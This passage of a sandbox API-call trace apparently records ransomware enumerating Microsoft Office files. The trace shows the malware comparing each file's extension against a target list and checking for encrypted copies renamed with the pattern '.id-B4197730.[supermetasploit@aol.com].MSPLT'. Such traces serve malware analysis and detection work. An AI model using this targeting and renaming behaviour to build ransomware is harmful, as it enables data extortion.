office\\root\\client\\api-ms-win-core-file-l1-2-0.dll")) returned 0x220 [0315.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l1-2-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.198] lstrlenW (lpString=".doc") returned 4 [0315.198] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.198] lstrlenW (lpString=".docx") returned 5 [0315.198] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.198] lstrlenW (lpString=".pdf") returned 4 [0315.198] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.198] lstrlenW (lpString=".xls") returned 4 [0315.198] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.198] lstrlenW (lpString=".xlsx") returned 5 [0315.199] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.199] lstrlenW (lpString=".ppt") returned 4 [0315.199] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.199] lstrlenW (lpString=".zip") returned 4 [0315.199] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.199] lstrlenW (lpString=".rar") returned 4 [0315.199] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.199] lstrlenW (lpString=".bz2") returned 4 [0315.199] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.199] lstrlenW (lpString=".7z") returned 3 [0315.199] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.199] lstrlenW (lpString=".dbf") returned 4 [0315.199] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.199] lstrlenW (lpString=".1cd") returned 4 [0315.199] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.199] lstrlenW (lpString=".jpg") returned 4 [0315.200] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.200] lstrlenW (lpString=".doc") returned 4 [0315.200] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.200] lstrlenW (lpString=".docx") returned 5 [0315.200] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.200] lstrlenW (lpString=".pdf") returned 4 [0315.200] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.200] lstrlenW (lpString=".xls") returned 4 [0315.200] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.200] lstrlenW (lpString=".xlsx") returned 5 [0315.200] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.200] lstrlenW (lpString=".ppt") returned 4 [0315.200] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.200] lstrlenW (lpString=".zip") returned 4 [0315.200] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.200] lstrlenW (lpString=".rar") returned 4 [0315.200] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.200] lstrlenW (lpString=".bz2") returned 4 [0315.201] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.201] lstrlenW (lpString=".7z") returned 3 [0315.201] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.201] lstrlenW (lpString=".dbf") returned 4 [0315.201] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.201] lstrlenW (lpString=".1cd") returned 4 [0315.201] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 77 [0315.201] lstrlenW (lpString=".jpg") returned 4 [0315.201] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.201] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.201] lstrlenW (lpString="api-ms-win-core-file-l2-1-0.dll") returned 31 [0315.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0315.227] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=18624) returned 1 [0315.227] CloseHandle (hObject=0x51c) returned 1 [0315.227] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll")) returned 0x220 [0315.328] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.829] lstrlenW (lpString=".doc") returned 4 [0315.829] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.830] lstrlenW (lpString=".docx") returned 5 [0315.830] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.830] lstrlenW (lpString=".pdf") returned 4 [0315.830] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.830] lstrlenW (lpString=".xls") returned 4 [0315.830] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.830] lstrlenW (lpString=".xlsx") returned 5 [0315.830] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.830] lstrlenW (lpString=".ppt") returned 4 [0315.830] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.830] lstrlenW (lpString=".zip") returned 4 [0315.830] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.830] lstrlenW (lpString=".rar") returned 4 [0315.830] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.830] lstrlenW (lpString=".bz2") returned 4 [0315.830] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.830] lstrlenW (lpString=".7z") returned 3 [0315.830] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.830] lstrlenW (lpString=".dbf") returned 4 [0315.830] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.830] lstrlenW (lpString=".1cd") returned 4 [0315.830] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.830] lstrlenW (lpString=".jpg") returned 4 [0315.830] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.831] lstrlenW (lpString=".doc") returned 4 [0315.831] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.831] lstrlenW (lpString=".docx") returned 5 [0315.831] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.831] lstrlenW (lpString=".pdf") returned 4 [0315.831] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.831] lstrlenW (lpString=".xls") returned 4 [0315.831] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.831] lstrlenW (lpString=".xlsx") returned 5 [0315.831] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.831] lstrlenW (lpString=".ppt") returned 4 [0315.831] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.831] lstrlenW (lpString=".zip") returned 4 [0315.831] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.831] lstrlenW (lpString=".rar") returned 4 [0315.831] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.831] lstrlenW (lpString=".bz2") returned 4 [0315.831] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.831] lstrlenW (lpString=".7z") returned 3 [0315.831] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.831] lstrlenW (lpString=".dbf") returned 4 [0315.832] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.832] lstrlenW (lpString=".1cd") returned 4 [0315.832] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 77 [0315.832] lstrlenW (lpString=".jpg") returned 4 [0315.832] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.832] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.832] lstrlenW (lpString="api-ms-win-crt-string-l1-1-0.dll") returned 32 [0315.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.833] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=24768) returned 1 [0315.833] CloseHandle (hObject=0x530) returned 1 [0315.833] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll")) returned 0x220 [0315.833] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0316.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.720] lstrlenW (lpString=".doc") returned 4 [0316.720] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0316.720] lstrlenW (lpString=".docx") returned 5 [0316.720] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0316.720] lstrlenW (lpString=".pdf") returned 4 [0316.720] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0316.721] lstrlenW (lpString=".xls") returned 4 [0316.721] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0316.721] lstrlenW (lpString=".xlsx") returned 5 [0316.721] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0316.721] lstrlenW (lpString=".ppt") returned 4 [0316.721] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0316.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.721] lstrlenW (lpString=".zip") returned 4 [0316.721] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0316.721] lstrlenW (lpString=".rar") returned 4 [0316.721] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0316.721] lstrlenW (lpString=".bz2") returned 4 [0316.721] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0316.721] lstrlenW (lpString=".7z") returned 3 [0316.721] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0316.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.721] lstrlenW (lpString=".dbf") returned 4 [0316.721] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0316.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.721] lstrlenW (lpString=".1cd") returned 4 [0316.721] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0316.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.722] lstrlenW (lpString=".jpg") returned 4 [0316.722] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0316.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.722] lstrlenW (lpString=".doc") returned 4 [0316.722] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0316.722] lstrlenW (lpString=".docx") returned 5 [0316.722] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0316.722] lstrlenW (lpString=".pdf") returned 4 [0316.722] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0316.722] lstrlenW (lpString=".xls") returned 4 [0316.722] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0316.722] lstrlenW (lpString=".xlsx") returned 5 [0316.722] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0316.722] lstrlenW (lpString=".ppt") returned 4 [0316.722] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0316.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.722] lstrlenW (lpString=".zip") returned 4 [0316.723] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0316.723] lstrlenW (lpString=".rar") returned 4 [0316.723] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0316.723] lstrlenW (lpString=".bz2") returned 4 [0316.723] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0316.723] lstrlenW (lpString=".7z") returned 3 [0316.723] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0316.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.723] lstrlenW (lpString=".dbf") returned 4 [0316.723] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0316.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.723] lstrlenW (lpString=".1cd") returned 4 [0316.723] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0316.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 78 [0316.723] lstrlenW (lpString=".jpg") returned 4 [0316.723] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0316.723] lstrcmpiW (lpString1=".exe", lpString2=".MSPLT") returned -1 [0316.724] lstrlenW (lpString="AppVDllSurrogate32.exe") returned 22 [0316.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0317.052] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=215768) returned 1 [0317.052] CloseHandle (hObject=0x470) returned 1 [0317.052] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe")) returned 0x220 [0317.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0318.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0318.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.487] lstrlenW (lpString=".doc") returned 4 [0318.487] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0318.487] lstrlenW (lpString=".docx") returned 5 [0318.487] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0318.487] lstrlenW (lpString=".pdf") returned 4 [0318.487] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0318.487] lstrlenW (lpString=".xls") returned 4 [0318.487] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0318.487] lstrlenW (lpString=".xlsx") returned 5 [0318.487] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0318.487] lstrlenW (lpString=".ppt") returned 4 [0318.487] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0318.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.487] lstrlenW (lpString=".zip") returned 4 [0318.487] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0318.487] lstrlenW (lpString=".rar") returned 4 [0318.487] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0318.487] lstrlenW (lpString=".bz2") returned 4 [0318.487] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0318.487] lstrlenW (lpString=".7z") returned 3 [0318.487] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0318.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.488] lstrlenW (lpString=".dbf") returned 4 [0318.488] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0318.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.488] lstrlenW (lpString=".1cd") returned 4 [0318.488] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0318.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.488] lstrlenW (lpString=".jpg") returned 4 [0318.488] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0318.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.488] lstrlenW (lpString=".doc") returned 4 [0318.488] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0318.488] lstrlenW (lpString=".docx") returned 5 [0318.488] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0318.488] lstrlenW (lpString=".pdf") returned 4 [0318.488] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0318.488] lstrlenW (lpString=".xls") returned 4 [0318.488] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0318.488] lstrlenW (lpString=".xlsx") returned 5 [0318.488] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0318.488] lstrlenW (lpString=".ppt") returned 4 [0318.488] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0318.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.488] lstrlenW (lpString=".zip") returned 4 [0318.488] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0318.489] lstrlenW (lpString=".rar") returned 4 [0318.489] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0318.489] lstrlenW (lpString=".bz2") returned 4 [0318.489] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0318.489] lstrlenW (lpString=".7z") returned 3 [0318.489] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0318.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.489] lstrlenW (lpString=".dbf") returned 4 [0318.489] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0318.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.489] lstrlenW (lpString=".1cd") returned 4 [0318.489] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0318.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 68 [0318.489] lstrlenW (lpString=".jpg") returned 4 [0318.489] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0318.489] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0318.489] lstrlenW (lpString="ucrtbase.dll") returned 12 [0318.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0319.107] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=982720) returned 1 [0319.107] CloseHandle (hObject=0x530) returned 1 [0319.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll")) returned 0x220 [0319.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0319.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.108] lstrlenW (lpString=".doc") returned 4 [0319.108] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0319.108] lstrlenW (lpString=".docx") returned 5 [0319.108] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0319.108] lstrlenW (lpString=".pdf") returned 4 [0319.108] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0319.108] lstrlenW (lpString=".xls") returned 4 [0319.108] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0319.108] lstrlenW (lpString=".xlsx") returned 5 [0319.108] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0319.108] lstrlenW (lpString=".ppt") returned 4 [0319.108] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0319.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.108] lstrlenW (lpString=".zip") returned 4 [0319.108] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0319.108] lstrlenW (lpString=".rar") returned 4 [0319.108] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0319.108] lstrlenW (lpString=".bz2") returned 4 [0319.108] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0319.108] lstrlenW (lpString=".7z") returned 3 [0319.108] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0319.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.108] lstrlenW (lpString=".dbf") returned 4 [0319.108] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0319.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.109] lstrlenW (lpString=".1cd") returned 4 [0319.109] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0319.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 58 [0319.109] lstrlenW (lpString=".jpg") returned 4 [0319.109] 